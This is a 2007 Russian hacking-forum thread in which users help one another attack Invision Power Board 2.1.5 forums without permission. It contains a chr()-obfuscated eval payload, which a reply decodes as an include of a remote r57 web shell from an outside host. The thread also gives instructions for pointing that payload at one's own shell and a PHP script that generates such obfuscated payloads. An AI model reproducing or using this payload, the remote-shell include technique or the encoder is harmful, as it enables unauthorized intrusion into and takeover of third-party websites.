ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Оффтоп > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблема с шеллом rst
  #1  
Старый 16.08.2007, 15:51
_Sniper_
Banned
Регистрация: 21.07.2007
Сообщений: 504
Провел на форуме:
1899369

Репутация: 445


Отправить сообщение для _Sniper_ с помощью ICQ
Question Проблема с шеллом rst

Смотрел видео..типо как получить админку в IPB 2.1.5
без использования сплойта.
Всё зделал как было написано (проверил на уязвимость index.php?act=task&ck=' )
Регюсь..логинюсь на форуме...создаю тему..
Содержание темы
Цитата:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Ну и т.д..ничего не работало т.к тот шелл уже с сервера удалён (rst)
Что можно зделать? Как "перекодировать" ссылку (ведь она мертва) на СВОЙ шелл..
Жду помощи.
 
Ответить с цитированием

  #2  
Старый 16.08.2007, 16:10
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Ну ты кнешн в нужном месте создал тему.
https://forum.antichat.ru/showpost.php?p=437257&postcount=11
__________________
 
Ответить с цитированием

  #3  
Старый 16.08.2007, 16:25
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Обисняю. тут ASCII коды символов. Если это расшифровать то будет так:
include "http://rst.void.ru/download/r57shell.txt";/*
Тебе нужно изменить адрес ссылки и снова загнать в ASCII коды, можешь посмотреть соответствия по таблице или написать программку, это дело 5 минут .
З.Ы. RST рулез, жаль что закрылись .
 
Ответить с цитированием

  #4  
Старый 16.08.2007, 16:25
_Sniper_
Banned
Регистрация: 21.07.2007
Сообщений: 504
Провел на форуме:
1899369

Репутация: 445


Отправить сообщение для _Sniper_ с помощью ICQ
По умолчанию

Можно видео по юзанью? А то я чёт ничего не понял..


И ещё...посмотрите вот это видео.. по поводу этого шелла.
http://pro-hack.ru/download/video/files/Video_ipb.rar

Последний раз редактировалось _Sniper_; 16.08.2007 в 16:27..
 
Ответить с цитированием

  #5  
Старый 16.08.2007, 16:44
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

Видео по юзанью чего? КАк загонять в ASCII или сплоит ссылку на который дал +toxa+?))) Думаю что про сплоит, короче он перле, ставишь на машину ActivePERL и ноу проблем, в сплоите кстати есть комментарии и довольно подробные по юзанью. а теску ты и правда сунул малясь нетуда.
 
Ответить с цитированием

  #6  
Старый 16.08.2007, 17:27
_Sniper_
Banned
Регистрация: 21.07.2007
Сообщений: 504
Провел на форуме:
1899369

Репутация: 445


Отправить сообщение для _Sniper_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от А®ТеS  
Обисняю. тут ASCII коды символов. Если это расшифровать то будет так:
include "http://rst.void.ru/download/r57shell.txt";/*
Тебе нужно изменить адрес ссылки и снова загнать в ASCII коды, можешь посмотреть соответствия по таблице или написать программку, это дело 5 минут .
З.Ы. RST рулез, жаль что закрылись .
Есть софт для шифровки\расшифровки? Или где можно зашифровать\расшифровать?
 
Ответить с цитированием

  #7  
Старый 16.08.2007, 18:22
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от _Sniper_  
Есть софт для шифровки\расшифровки? Или где можно зашифровать\расшифровать?
хз, есть или нет, накатал за 10 мин

PHP код:
<?php
    
print "<form method = 'post'><textarea name = 'string' cols = '100' rows = '20'></textarea><br /><br />";
    print 
"<input type = 'submit' value = 'Send >>' /></form>";
    if (isset(
$_POST["string"]))
        {
            print 
"eval( ";
            for (
$i=0$i<strlen($string); $i++)
            {
                
$arr[] = substr($string$i1);
                print 
"chr(".ord($arr[$i]).")";
                (
$i+!== strlen($string)) ? print ". " : print " ";
            }
            print 
"); //";
        }
?>
Должно работать

зы: в асю уже написали.. по поводу массива - конечно, можно и без него, просто у меня немного другие планы появились, пока писал скрипт)

Последний раз редактировалось n1†R0x; 16.08.2007 в 18:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема с icq reider ICQ 6 16.08.2007 14:47
Ipb 2.1.6 проблема с шеллом =XSS= Форумы 17 26.11.2006 11:31
Проблема с шеллом }{0TT@БЬ)Ч Уязвимости 10 16.04.2006 22:04
Hydra проблема с брутом Utochka Уязвимости 2 02.03.2006 23:37
Проблема с перл Эксплойтом для ipb 2.0.* SURRENDER Форумы 2 07.12.2004 12:58



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ